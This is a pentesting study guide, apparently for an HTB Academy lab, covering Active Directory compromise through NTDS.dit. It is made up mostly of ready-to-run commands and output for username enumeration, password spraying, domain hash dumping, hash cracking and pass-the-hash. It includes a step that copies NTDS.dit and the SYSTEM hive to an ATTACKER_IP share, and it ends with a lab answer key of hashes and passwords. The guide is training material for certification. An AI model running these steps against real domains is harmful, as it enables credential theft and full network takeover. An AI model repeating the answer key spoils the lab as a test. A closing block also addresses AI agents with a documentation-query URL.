# NTDS.dit Extraction & Analysis ## 🎯 Overview **NTDS.dit** (NT Directory Services Directory Information Tree) is the **holy grail** of Active Directory attacks. This file contains: * **Every domain user's password hash** * **Group memberships and permissions** * **Kerberos keys and authentication data** * **Complete domain schema information** > **"If this file can be captured, we could potentially compromise every account on the domain"** ## 🏗️ Active Directory Authentication Architecture ### Domain Authentication Flow ``` User Login → LSASS.exe → Authentication Packages → NTLM/Kerberos → AD Directory Services ``` ### Key Points * **Domain-joined systems** authenticate against Domain Controller, not local SAM * **Local accounts** still accessible with `hostname\username` or `.\username` * **NTDS.dit location**: `%systemroot%\ntds\NTDS.dit` (usually `C:\Windows\NTDS\NTDS.dit`) ## 🔍 Username Enumeration and Discovery ### OSINT for Employee Discovery ```bash # HTB Academy Example: # Found through social media/company website: # - John Marston (IT Director) # - Carol Johnson (Financial Controller) # - Jennifer Stapleton (Logistics Manager) # Google dorking techniques: "@inlanefreight.com" site:linkedin.com "inlanefreight.com filetype:pdf" site:inlanefreight.com "directory" OR "staff" OR "employees" ``` ### Username Generation with Username Anarchy ```bash # Clone Username Anarchy git clone https://github.com/urbanadventurer/username-anarchy.git cd username-anarchy # Generate username variations for John Marston ./username-anarchy John Marston > usernames.txt # Manual creation of targeted list cat > usernames.txt << EOF jmarston john.marston marston.john cjohnson carol.johnson johnson.carol jstapleton jennifer.stapleton stapleton.jennifer EOF ``` ### Username Enumeration with Kerbrute ```bash # Download Kerbrute wget -q https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 -O kerbrute chmod +x kerbrute # Get domain name first netexec smb 10.129.202.85 # Output shows: (domain:ILF.local) # Enumerate valid usernames ./kerbrute userenum -d ILF.local --dc 10.129.202.85 usernames.txt # Expected output: # [+] VALID USERNAME: jmarston@ILF.local # [+] VALID USERNAME: cjohnson@ILF.local # [+] VALID USERNAME: jstapleton@ILF.local ``` ## 🗡️ Password Attacks Against Active Directory ### Dictionary Attacks with NetExec ```bash # Brute force single user netexec smb 10.129.202.85 -u jmarston -p /usr/share/wordlists/fasttrack.txt -d ILF.local # Password spraying multiple users netexec smb 10.129.202.85 -u usernames.txt -p /usr/share/wordlists/fasttrack.txt --continue-on-success -d ILF.local # HTB Academy result: # [+] ILF.local\jmarston:P@ssword! ``` ### Kerbrute Password Attacks ```bash # Brute force with Kerbrute ./kerbrute bruteuser -d ILF.local --dc 10.129.202.85 /usr/share/wordlists/fasttrack.txt jmarston # Expected result: # [+] VALID LOGIN: jmarston@ILF.local:P@ssword! ``` ## 🎫 NTDS.dit Extraction Methods ### Method 1: NetExec ntdsutil Module (Fastest) ```bash # One-command NTDS.dit extraction netexec smb 10.129.202.85 -u jmarston -p 'P@ssword!' -d ILF.local -M ntdsutil # Alternative direct method netexec smb 10.129.202.85 -u jmarston -p 'P@ssword!' -d ILF.local --ntds # Expected output: # NTDSUTIL 10.129.202.85 445 DC01 [*] Dumping ntds with ntdsutil.exe # NTDSUTIL 10.129.202.85 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b::: # NTDSUTIL 10.129.202.85 445 DC01 jstapleton:1134:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24::: ``` ### Method 2: Manual VSS (Volume Shadow Copy) ```bash # Step 1: Connect with Evil-WinRM evil-winrm -i 10.129.202.85 -u jmarston -p 'P@ssword!' # Step 2: Check privileges (ensure Domain Admin) net user jmarston # Look for: Global Group memberships *Domain Admins # Step 3: Create Volume Shadow Copy vssadmin CREATE SHADOW /For=C: # Output: Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2 # Step 4: Copy NTDS.dit and registry hives mkdir C:\temp cmd.exe /c copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit" C:\temp\NTDS.dit cmd.exe /c copy "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM" C:\temp\SYSTEM # Step 5: Transfer to attack host # On attack host: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /tmp/ # On target: cmd.exe /c move C:\temp\NTDS.dit \\ATTACKER_IP\CompData cmd.exe /c move C:\temp\SYSTEM \\ATTACKER_IP\CompData ``` ### Method 3: Impacket secretsdump ```bash # Remote NTDS.dit extraction python3 secretsdump.py ILF.local/jmarston:P@ssword!@10.129.202.85 -just-dc-ntlm # Local extraction from files impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL ``` ## 🔓 Hash Cracking and Analysis ### Hash Format Understanding ```bash # NTDS.dit output format: # username:RID:LM_hash:NT_hash::: # HTB Academy Jennifer Stapleton example: # jstapleton:1134:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24::: # ^-- This is the NT hash to crack ``` ### Extracting and Cracking Jennifer Stapleton's Hash ```bash # Extract Jennifer Stapleton's hash grep -i "stapleton" ntds_dump.txt # Output: jstapleton:1134:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24::: # Extract just the NT hash (4th field) echo "161cff084477fe596a5db81874498a24" > jstapleton_hash.txt # Crack with Hashcat hashcat -m 1000 jstapleton_hash.txt /usr/share/wordlists/rockyou.txt # HTB Academy result: # 161cff084477fe596a5db81874498a24:Winter2008 ``` ### Bulk Hash Processing ```bash # Extract all NT hashes from NTDS dump grep ":::" ntds_dump.txt | cut -d: -f4 > all_nt_hashes.txt # Create username:hash mapping grep ":::" ntds_dump.txt | awk -F: '{print $1":"$4}' > user_hash_mapping.txt # Extract only enabled accounts grep -iv disabled ntds_dump.txt | cut -d: -f1 > enabled_users.txt ``` ## ⚔️ Pass-the-Hash Attacks ### When Cracking Fails ```bash # Use NT hash directly for authentication evil-winrm -i 10.129.202.85 -u Administrator -H 64f12cddaa88057e06a81b54e73b949b # Lateral movement with Impacket python3 psexec.py -hashes :64f12cddaa88057e06a81b54e73b949b Administrator@TARGET_IP # Network-wide testing with NetExec netexec smb SUBNET_RANGE -u Administrator -H 64f12cddaa88057e06a81b54e73b949b ``` ## 🏆 Complete HTB Academy Attack Workflow ### Phase 1-2: Discovery and Enumeration ```bash # 1. OSINT: Found John Marston, Carol Johnson, Jennifer Stapleton # 2. Generate usernames with Username Anarchy ./username-anarchy John Marston > usernames.txt # 3. Domain discovery netexec smb 10.129.202.85 # → domain:ILF.local # 4. Username validation ./kerbrute userenum -d ILF.local --dc 10.129.202.85 usernames.txt # → [+] VALID USERNAME: jmarston@ILF.local ``` ### Phase 3-4: Password Attack and NTDS Extraction ```bash # 5. Password brute force ./kerbrute bruteuser -d ILF.local --dc 10.129.202.85 /usr/share/wordlists/fasttrack.txt jmarston # → [+] VALID LOGIN: jmarston@ILF.local:P@ssword! # 6. NTDS.dit extraction netexec smb 10.129.202.85 -u jmarston -p 'P@ssword!' -d ILF.local -M ntdsutil # → All domain hashes extracted ``` ### Phase 5: Hash Cracking ```bash # 7. Extract Jennifer Stapleton's hash # jstapleton:1134:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24::: # 8. Crack the hash echo "161cff084477fe596a5db81874498a24" > jstapleton_hash.txt hashcat -m 1000 jstapleton_hash.txt /usr/share/wordlists/rockyou.txt # → Result: Winter2008 ``` ## 📋 Quick Reference Commands ### Discovery ```bash # Domain enumeration netexec smb TARGET_IP # Username enumeration ./kerbrute userenum -d DOMAIN.local --dc TARGET_IP usernames.txt # Password attacks netexec smb TARGET_IP -u users.txt -p passwords.txt --continue-on-success -d DOMAIN.local ``` ### NTDS.dit Extraction ```bash # NetExec method (recommended) netexec smb TARGET_IP -u USER -p PASS -d DOMAIN.local -M ntdsutil # Direct extraction netexec smb TARGET_IP -u USER -p PASS -d DOMAIN.local --ntds # Impacket method python3 secretsdump.py DOMAIN.local/USER:PASS@TARGET_IP -just-dc-ntlm ``` ### Hash Analysis ```bash # Extract NT hashes grep ":::" ntds_dump.txt | cut -d: -f4 > nt_hashes.txt # Crack with Hashcat hashcat -m 1000 nt_hashes.txt /usr/share/wordlists/rockyou.txt # Pass-the-Hash evil-winrm -i TARGET_IP -u Administrator -H NTHASH ``` ## 🎯 HTB Academy Answer Key Based on the complete walkthrough: 1. **NTDS.dit file name**: `NTDS.dit` 2. **Administrator NT hash**: `64f12cddaa88057e06a81b54e73b949b` 3. **John Marston credentials**: `jmarston:P@ssword!` 4. **Jennifer Stapleton password**: `Winter2008` ## 💡 Key Takeaways 1. **OSINT drives success** - Real employee names lead to valid usernames 2. **Username enumeration first** - Validate targets before password attacks 3. **NTDS.dit = domain ownership** - Every account's hash in one file 4. **NetExec ntdsutil** - Fastest extraction method 5. **VSS understanding** - Manual method for deeper control 6. **Pass-the-Hash** - Use hashes when cracking fails 7. **Complete methodology** - From OSINT to domain compromise *** *This guide covers the complete NTDS.dit attack methodology as demonstrated in HTB Academy's Password Attacks module.* --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kabaneridev.gitbook.io/pentesting-notes/certification-preparation/cpts-prep/password-attacks-and-lateral-movement/active-directory-attacks/active-directory-ntds-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.